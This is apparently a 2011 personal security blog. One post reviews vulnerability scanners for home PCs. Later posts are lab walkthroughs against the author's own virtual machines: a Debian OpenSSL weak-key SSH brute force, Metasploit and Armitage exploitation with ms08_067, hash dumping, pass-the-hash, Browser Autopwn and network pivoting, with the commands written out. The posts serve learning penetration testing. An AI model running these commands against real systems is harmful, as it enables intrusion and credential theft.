Saturday, December 24, 2011

Vulnerability Assessment for Personal Computers

According to The Free On-line Dictionary of Computing (n.d.), a vulnerability is a bug or feature of a system that exposes it to possible attack or a flaw in the system’s security.  As time goes on, it is very difficult to be up-to-date on the latest vulnerabilities for any individual.  Notably, with the amount of zero-days being released and third-party software’s possibly opening new port(s) to your computer.  There are a variety of vulnerability scanners for an individual to use to assess their system for any flaws to patch.  The following blog post will discuss four great individual scanners but put these scanners together will create a synergy that will become greatly beneficial to the user.
First is Nessus by Tenable at  It is free for home users and according to their website, the product features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture.  When I use this product, the output is incredible easy to read and understand.  They label each vulnerability as high, medium, or low according to their criticality and ease of being exploited.
Nessus uses plug-ins that is vital to the program to scan for vulnerabilities in your system.  The plug-ins are continuously updated.  It is similar to the signatures anti-viruses use to monitor new viruses on your computer.
The installation documentation is straight forward.  You may find it here in PDF format at  The product is available for Windows and Linux.  In high-level terms, to install Nessus, you need to complete the following steps:
1.       Download the installer from
2.       Register for a key on the Nessus website by submitting your e-mail address.  Nessus will e-mail you a unique product key that can be used to register the product.
3.       Install the program.
4.       Create a Nessus user to access the system.
5.       Update the plug-ins.
Nessus runs using client/server type architecture.  Once set up, the server runs quietly in the background, and you interact with the server through a browser.  Once you have installed the Nessus server, you can access it by opening a browser and entering in the URL.  You use the username and password you created when installing the program.
From there, you set up a scan policy.  There are some pre-configured policies you may run or you can manually set up a custom policy.  I usually don’t stray much from the pre-configured policy since I only scan my desktop computer and laptop.  Continue clicking “Next” until you reach the end of completing your policy and click the “Submit” button.  Go to the menu and click “Scan” and enter a name for your scan.  Select the pre-configured policy or the custom-made policy that you just went through and enter the IP addresses that you want scan and click “Launch Scan.”  When the scan completes, you may click on “Reports” on the menu and you will be able to view the results from the scan along with recommendations for any flaws found in your system.
Next is Microsoft Baseline Security Analyzer (MBSA).  This tool is absolutely amazing for the Microsoft operating system and products.  Overall, Nessus is a better vulnerability scanner in my opinion but to determine the true security posture of your Windows system, MBSA will administer a detailed report.  You may download the program at  Microsoft explains the product as ("Microsoft baseline security,”):
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small- and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Improve your security management process by using MBSA to detect common security misconfigurations and missing security updates on your computer systems.
Although Microsoft website explains that it produced the product for IT professionals to help small and medium sized businesses, I believe it can immensely help individuals secure their personal computers.  I use the tool about once a month and the accuracy of the report is great.
Click “Scan a computer.” Enter the IP address of your computer.  You may find the IP address by going to start/run or type ‘cmd’ in the search box/type ‘ipconfig’ and press enter.  Enter the IPv4 address and click “Start Scan” at the bottom right of the screen. 
If an error comes up because a certain service is not running, click start and type “services.msc” in the search box or in “Run” and hit enter.  Find the service, “Server” to start the service and you can be certain by looking in the status column that it has started.  I believe this service is started by default but I disable the service for my desktop.  Repeat the previous steps to start the scan over.  The end result will allow you to download a PDF report to review.  The report will give you statuses on Windows updates, their own software updates (e.g. Office), system standard compliances (depending on the software installed), administrative vulnerabilities (e.g., passwords, firewall, file system, etc.), and additional vulnerability assessment.  It is an incredible tool for Microsoft Windows and their products.
So far, Nessus is for your system, MBSA is for Windows operating system and Microsoft products. Lastly are Secunia and FileHippo for third-party softwares (i.e., that does not include Microsoft).  Secunia has a product called Personal Software Inspector (PSI) and is free to download at   The product patches insecure programs and helps safeguard your data and PC against cybercriminals.  According to Secunia website, it is a security scanner which identifies programs that are insecure and need updates. It even automates the updating of many of these programs, making it a lot easier to maintain a secure PC.  FileHippo is a similar program to Secunia PSI.  It scans your computer and list which programs are in need of an update.
Secunia PSI and FileHippo take the worries out of wondering if third-party software is in need of an upgrade.  Today, users download so many software’s, it is understandably difficult to update each one or worse, to leave some of them unpatched for a period of time.  Download and use these tools to your advantage and keep your personal computer safe by adding the extra layer of security.  J
1.       Microsoft baseline security analyzer mbsa legacy product solution. (n.d.). Retrieved from
2.       Free computer security - personal software inspector (psi) - secunia. (n.d.). Retrieved from
3.       Vulnerability. (n.d.). The Free On-line Dictionary of Computing. Retrieved December 23, 2011, from website:

The video entails the use of Nessus, MBSA, Secunia, and FileHippo.  It is meant to demonstrate their functionality and how each one serves a different purpose to helping users become safer on the Internet.
I will be using Nessus through BackTrack 5 to scan my Windows 7 machine.  I have already registered for Nessus, so that part will not be shown.  For MBSA, Secunia, and FileHippo, I will be using my personal computer to scan itself.
As you will see in the video, each product produces different results.  FileHippo stated that my computer was up-to-date but Secunia found third-party software that was needed to be patched.  One product is not better than the other; I believe both products are needed for personal computers.  For MBSA, it takes time to scan the computer and download updates.  Be patient and the results will come.  Nessus is a great tool, not much to comment.  It is laid out great and easy to follow.
Thank you for reading and/or watching the video.  Look to the right for my other personal profiles.  I have accounts for: Twitter, Facebook, LinkedIn, YouTube, and I plan to sign up for Google+.  Please follow or continue to follow.  Thank you.

Note: IE won't play Vimeo (at least on my computer), so I will post both YouTube and Vimeo.  Firefox users, I prefer Vimeo.  IE users have to use YouTube, the direct link to the video.

Thursday, December 22, 2011


I read Metasploit: The PenetrationTester’s Guide.  It was an incredibly, well-written book.  The book gave me a better understanding of the Metasploit’s Framework and the ability to take full advantage of the Framework and its exploits.  Chapter 17 consisted of a “simulated penetration test” for the vulnerable Linux machine called Metsploitable (torrent).  Metasploitable is meant to apply the techniques learned in the previous chapters to crack the machine in order to acquire full control with administrative access.  This blog post will comprise of two parts.  The first will demonstrate the steps I took to get control of the vulnerable Metasploitable machine and the second part will give a brief description of the Metasploit’s Framework and the layout structure in BackTrack 5.
The basic methodology for a penetration test consists of:
·         Reconnaissance
·         Scanning (Port and Vulnerability)
·         Exploitation
·         Maintaining Access
·         Post-Exploitation
For this demo, I will be using VMWareWorkstation for BackTrack 5 (attacker) and Metasploitable (victim) virtual machines. 
First, I’ll scan the network for live hosts from BackTrack 5 with Nmap (network mapping) tool.  I will use the command:
With the results, I discovered a live host with abnormal amounts of open ports running on To further probe those ports for services running and version detection, I’ll apply the command:
nmap -sS -A
·         -sS equals tcp syn scan. This will give a SYN-ACK packet back to acknowledge an open port. To further understand this process, research the three-way handshake for TCP.
·         -A means aggressive.  It will apply the combination of -O for OS detection, -sV for version detection,-sC to perform the scan with default scripts, and --traceroute for the path to host. -A is great.
Through this probe, I find a couple of Apache servers running.  I determine if there are any websites running on those ports.  Unfortunately, there are not and both are running default pages for Apache and TomCat servers.  My next move is to further analyze the SSH port since it has a version number and type.  I do a search on The Open Source Vulnerability Database with the assumption that everything running on this system is unpatched.
When I conduct a search for “Debian on OpenSSL” it leads me to a vulnerability for cryptographic weakness.  I click on the ID, 45029.  From there, I usually look for a link to Exploit-DB.  They have an incredible amount of exploits explaining the workings of the exploits.  Off topic, they have informative papers written by individuals interested in the field.  Beginners to experts can benefit from skimming through the papers of their interest.
I click on the link next to Exploit Database: 5720.  It leads me directly to an exploit for “Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python).
A Perl script was made to use precalculated SSH keys to brute force the SSH login prompt.
I will execute the script:
python /root/Desktop/rsa/2048 root 22 5
·         Python is the language of the code and needed to execute
·         The directory is where the keys are stored for the code to run
·         Root is the username
·         22 is the port of SSH
·         5 is the number of tasks it is able to run at one time.  Instead of running one script per login in, the attacker can run multiple login in parallel.  Although, it is not good to run this number to high.  Keep it reasonable.
After reviewing the script, I learned that the vulnerability was caused by Debian OpenSSL only producing 65,536 possible or so keys to be generated.  Obviously, this means an attacker with enough keys can brute force their way to login to the system given enough time.
In the comments, it is laid out in sequential order on how to exploit this system.
2.       Once downloaded, type the command: tar –jxvf debian_ssh_rsa_2048_x86.tar.bz2
3.       Hit enter to extract it to the current directory.
4.       The contents are the SSH keys needed to brute force the system
5.       Type command: python *the directory of the rsa keys *the target IP address root 22 5
a.       Ex: python /root/Desktop/rsa/2048 root 22 5
6.       Once the key is found, type the command: ssh -lroot -p22 -i *directory of the keys/*the key that was found *target IP address
a.       You will be able to copy and paste the result. When the scan is over, it will give you the exact command you need to crack the system.
b.      Ex: sshlroot –p22 –I /root/Desktop/rsa/2048/*Found key

I apologize but for some odd reason, Vimeo is not working in Internet Explorer.  I tried with multiple users and each user was unable to view my video.  I really liked their service in comparison to YouTube.  Until, I find Vimeo working on Internet Explorer, I will be posting my YouTube videos.  My YouTube videos have music playing in the background. If that seems annoying, please view go to my Vimeo page for this blog and view it in Firefox or scroll to the bottom of the page for the embedded Vimeo video (Firefox only). Thank you and afterwards, be sure to continue reading to receive further understanding of the amazing Metasploit's exploitation framework.

I do not know the reason but the YouTube video is nearly 7 minutes longer; although, it contains the same content.

In short, the vulnerability was caused by the limited amount of "random" keys generated.  For this program, an attacker had a 1 in 2 to the power of 15 chance of choosing the correct key (1 in 32,768).  With today's computing power, there is no effort in being able to pick the correct key.  Usually programs have at least 2 to the power of 1024; which equals 1.797693134862315907729305190789e+308.  It's kind of surprising that they would leave that line of code in there, but oh well. :)  It makes it fun to crack.

Metasploit is a free and open source framework for exploitation.  Msfconsole and msfcli are the user interfaces that Metasploit offers.  Armitage is the GUI interface for MetasploitMetasploit allows exploiting a vulnerable system through different methods and to maintain interaction and control with that system.  The Framework's directory is well organized and collected with the latest exploits for a variety of systems and numerous payloads to deliver.
An exploit is a piece of code that can take advantage of a system’s vulnerability.  A vulnerability includes an unpatched software or operating system, a poorly written third-party software, etc.  A payload is a piece of code that executes something on the victim’s machine due to the exploit.  For example, the attacker would exploit a vulnerable system for the advantage of controlling that system.  With this advantage, the attacker will send a payload (a written code) for the system to execute and give the attacker interactive capabilities.  The interactive capabilities includes a shell prompt (similar to the command prompt in Windows), VNC (virtual network computing) access (similar to Remote Desktop in Windows), and dozens more.
To access the framework and view the contents in BackTrack 5, change directories as follows:
cd /pentest/exploits/framework
·         Documentation includes information about how to use the various aspects of Metasploit.
·         Msfconsole provides an all-in-one interface to almost every option and setting avilabe in the Framework (Kennedy, O'Gorman , Kearns & Aharoni, 2011).
·         Msfcli runs directly from the command line.
·         Msfupdate updates the Framework with the latest exploits.

cd /modules
·         Auxiliary modules are associated with scanning for vulnerable systems.
·         Exploits allows an attacker to take advantage of a flow within a system, an application, or a service (Kennedy, O'Gorman , Kearns & Aharoni, 2011).  It is organized by the operating system; such as, Linux, Solaris, UNIX, Windows, and others.
·         Payload is a selected code from the Framework and delivered by the attacker for the targeted system to execute.

 Under the “windows” directory for exploits, you will be able to view a wide range of exploits.  The useful ones include:
·         dcerpc which stands for Distributed Computing Environment Remote Procedure Call.  This will allow an attacker remote access to the system.
·         browser for client-side exploits for Internet Explorer, RealPlayer, Facebook, Quicktime, iTunes, etc.  It’s a huge list.
·         iis (Internet Information Services) includes server-side exploits for Microsoft’s web server.
·         smb (Server Message Block) for server-side exploits.
Under “payloads” in the modules directory, you will see directories for singles, stages, and stages.
·         Singles are stand-alone payloads.  The functionality of the payload and its communication with the attacker are bundled together.  For Windows, an attacker will be able to add a user, obtain an interactive shell, download files, etc.
·         Stagers are codes that are loaded into memory that allow communication to the attacker.  This includes listening on a TCP ports or having full connection on a TCP port among others.
·         Stages are the end result of payload functionality.  This includes remote shell, Meterpreter session, VNC session for GUI control, etc.

1.       Kennedy, D., O'Gorman , J., Kearns, D., & Aharoni, M. (2011). Metasploit: The penetration tester guide. No Starch Press.

Thank you to the Authors for a great book. However, I’m still a work in progress in trying to get past the self-conscious feeling of being a script-kiddie.  My next move is to have a better understanding of the C language and Assembly language, I bought the book, Hacking: The Art of Exploitation, and I plan on reading Gray Hat Hacking 3rd Edition.  Thank you to the security community for the amount of knowledge you have passed on for me and others to learn.

Metasploitable from Surapheal Belay on Vimeo.

Wednesday, October 26, 2011

Illustrating the Process of a Network Attack with Armitage

This post will be demonstrating the same attack as the previous post but through Metasploit’s GUI front-end tool named, Armitage.  An attacker is able to discover hosts or scan a network with the integrated Nmap tool, provide an automated list of vulnerabilities for each host depending on the open ports/services running, subsequently the attacker will just point and click to exploit a vulnerability from the list that is provided and transmit a payload to compromise and control the victim.  The following phase is where I feel Armitage is better than ‘msfconsole.’ 
Armitage has great benefits in the ‘post-exploitation’ phase.  One, an attacker is able to interact with multiple machines at once, versus having to ‘background’ a meterpreter session to interact with another.  Another benefit with the use of Armitage is the incredible ease of browsing files and downloading/uploading files to the victim’s computer.  Lastly, an attacker would be able to pivot (hop) to network’s that were not directly accessible. 
Below is a graphical illustration of the process an attacker would use with the Armitage tool.

Now, onto the demonstration.  The following explains the network setup:
First Network (
·         BackTrack 5  
·         Windows XP SP3
·         Windows 7   
Windows 2003 web server with two interfaces; each facing a different network.
· /
Second Network (
·         Windows XP SP2
Host Discovery (Information Gathering)
o Start Armitage by going to BackTrack/Exploitation Tools/Network Exploitation Tools/Metasploit Framework/armitage
o Click ‘Start MSF’
o Select Hosts/Nmap Scan/Quick Scan (OS detect)
o Enter your target network and click ‘OK’. I entered the ‘First Network,’
o Wait until the pop-up message displays ‘Scan Complete!’ and click ‘OK.’
o A graphical icon list – depending on OS – will be displayed.
Analyze Scan Data for Exploits and Determine a Remote Attack or Client-Side Attack
o Go to the menu and select Attacks/Find Attacks/by port
Attack by ports is selected since we performed an Nmap scan, which gathered a list of open ports and services running.
You would select ‘by vulnerability’ if a completed vulnerability scan, such as, Nessus would have been imported.
o Wait until a pop-up message is displayed stating ‘Attack Analysis Complete…’ and click ‘OK’
From here, you can go to any host and right-click to select ‘Attack’ to view a list of vulnerabilities and the menu to the right will list known exploits for those vulnerabilities.
o I right-clicked on the ‘’ (Windows 2003) machine and selected the ‘ms08_067_netapi’ exploit.  This exploit never fails at owning/compromising a Windows XP or Windows 2003 machine.  Click ‘Launch’ to transmit the payload for a meterpreter session.
o I chose the same exploit for ‘’ (Windows XP SP3).
Post-Exploitation Phase
o Now, I will perform ‘post-exploitation’ on the compromised hosts.
o For the, I migrated to a different task by right-clicking on the host and selecting Meterpreter/Access/Migrate Now!
o On the same host (, I right-clicked and selected Meterpreter/Interact/Run VNC.
o A pop-up message will display the port to connect to a VNC session.
o I open a ‘Konsole’ and type the command vncviewer[port]. The port changes everytime you select to run a VNC session.
o Press enter, and TightVNC or the VNC program you have installed will open.  You will be able to have complete view and control of the victim’s machine.  Well, the meterpreter session gives the attacker complete control, especially with the greater amount of scripts an attacker is able to run in ‘msfconsole.’  Anyways, I pulled up the host next to the VNC session for further clarity.
o For the, I will browse the directories on the computer by right-clicking on the host and selecting Meterpreter/Explore/Browse Files.  Armitage displays a great graphical interface to browse the files; along with the capability of downloading or uploading files.
o Next, I will display the capability of taking a screenshot of the victim’s computer by right-clicking and selecting Meterpreter/Explore/Screenshot.
o After that, I will dump (collect) the user names and hashes (passwords) by right-clicking on the host and selecting Meterpreter/Access/Dump Hashes/lsass method.
o Wait for the pop-up message that states ‘Hashes dumped’ and click ‘OK.’  To display them, go to the menu and click View/Credentials.
o Conveniently, the attacker is able to try and crack the passwords by selecting ‘Crack Passwords’ and using the default wordlist or loading a custom wordlist.
o Luckily, with Windows machines, we can perform a technique called ‘Pass the Hash.’  There is no need to know the password, if the attacker has the username with the correct hash that will be enough to gain authorization.
Network Pivoting
o Once the attacker has reached a goal with the compromised hosts or determines there isn’t anything of value, an ARP scan would be the next logical step to determine if the hosts are connected to other networks that are not directly accessible to the attacker.

An ARP (Address Resolution Protocol) sends requests packets to hosts within the local area network to determine the MAC (hardware) address of the requested host through the known IP (Internet Protocol) address.

o I right-click on the host since it was a server and select Meterpreter/ARP Scan.
o On the pop-up, I select the unknown network ( to view a list of hosts IP addresses and MAC addresses.
In essence, we are now starting the attack process again.  We discovered new hosts, then we analyze the open services and vulnerabilities, then determine exploit.  Pivoting allows an attacker to go deep into the network.
Next, I need to setup a pivot.  Through this method, I will set a stager on the server and this will allow me to seem as if I am an authorized user on the server in order to interact with the other hosts.
o Right-click the Windows 2003 ( and select Meterpreter/Pivoting/Setup.
o Select the second network ( and click ‘Add Pivot.’
o The pivot will be successful when a pop-up message states ‘Route added.’  You will see the Windows 2003 displaying an arrow to each of the hosts in the new network.
Hit Ctrl+H to display a clearer connection from the 2003 Server to the newly discovered hosts.
Now, we need to scan the unknown hosts to determine the OS and open services running.
o Right-click on an unknown host and click ‘scan’ and click ‘OK’ for the pop-up message.
o I right-click host and select Login/psexec.  This will allow me to perform ‘Pass the Hash’ technique on the host with previously collected usernames and hashes.
I wait until the process is complete to find successful login information.
o I right-click host and select Login/psexec.  I select the successful user and pass login and click ‘Launch.’
o With the correct username/hash (password), I will have authorization over the machine.
I forgot to compromise the Windows 7 machine and decided to do it at that moment.
o Go to the menu and select Attacks/Browser Autopwn
This will set the attacker’s IP address as a web server; furthermore, it will load up a collection of modules that will be able to perform ‘browser-fingerprinting’ to any client that visits the attacker’s malicious IP address.  At that moment, it will determine the type and version of the victim’s browser and exploit the visitor’s machine for the attacker to gain full control.
o The Browser AutoPWN will be preloaded with required settings.  You just have to set the URI path.  That is the path after the attacker’s IP address.  I just enter ‘/’  Also, you can set the SRVPORT to 80.  That is default port for a web server so the victim just has to visit the address without a port set following the address.
o The IP address that needs to be visited will be displayed when the web server is up and running.
o The address is
o I go to my Windows 7 machine and open IE 8 and visit the malicious site.
o Fortunately, we owned another box.

Monday, October 10, 2011

Pivoting into Other Systems with Metasploit

Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network.  For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network.  According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.

For this setup, I will use the following VirtualBox virtual machines:
·         BackTrack 5 R1
o   Attacker machine
·         Windows Server 2003
o   Web Server
o   Accessible (Public IP) –
o   Non-accessible (Private IP)  –
·         Windows XP
o   Host machine
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and setup a staging point on the server for pivot to the Windows XP host that is only accessible to users inside the network.
First, I will map the network with Nmap to discover any accessible hosts
·         nmap -sS
Once I discovered, I will scan for open ports and services running
·         nmapsV -O
The scan informs me that port 80 (web server port for public access) is running an Apache Web Server; along with port 135 and port 139.  I use the Windows netapi exploit, known as “Server Service Vulnerability.”
·         use windows/smb/ms08_067_netapi
·         show payloads
·         set PAYLOAD windows/meterpreter/bind_tcp
o   Bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect and maintain access to the machine.
·         show options
o   View what settings are needed.
·         set RHOST
·         show targets
o   To specify our specific target
·         set target 9
o   Target 9 is Windows Server 2003 SP1
·         exploit
Once the host is exploited, a meterpreter session is created and our machine has direct access and control over the machine.  We confirm this by entering the ipconfig command to view the IP address.  The command returns:
· /
· /
Since we do not have access to the network, we will run an ARP scan and discover hosts that are up in the network.
·         run arp_scanner -r
With the discovered network and hosts, we will setup a route to have the private network send packets (data) through our machine (meterpreter session id).  First, we have to background our meterpreter session.
·         background
·         route add 1
o   The command will route the subnet traffic through our meterpreter session id, 1.
o   You can view the session id by entering the command sessions –l
·         route print
o   To view the previously entered command
We need to do a port scan on the discovered host from the arp_scan to find a port that we can setup communication.  First, we need to go back and access the auxiliary module for TCP port scanning.  The required settings that will be set is the remote host (RHOSTS).
·         back
·         use scanner/portscan/tcp
·         show options
·         set RHOSTS
·         run
Port 25, 80, 135, and 139 are open.  We will use the RPC exploit in port 135 and subsequently have direct access and control over the machine with a meterpreter session.
·         back
·         use windows/smb/ms08_067_netapi
·         show options
·         set RHOST
·         set PAYLOAD windows/meterpreter/bind_tcp
·         show options
·         show targets
o   To specify our specific target
·         set target 9
o   Target 3 is Windows XP SP2
·         exploit
A meterpreter session should be created and the attacker machine has full control of the compromised host in the private subnet.  Type ipconfig to view the compromised host IP configuration.
Background the meterpreter session by entering the command background.
View your sessions by typing sessions.
The output will display the steps you have taken to get from your machine to the host in the private subnet under the “Connection” column.
  • ->
    • From the attacker machine to the web server
  • ->
    • From the web server to the XP host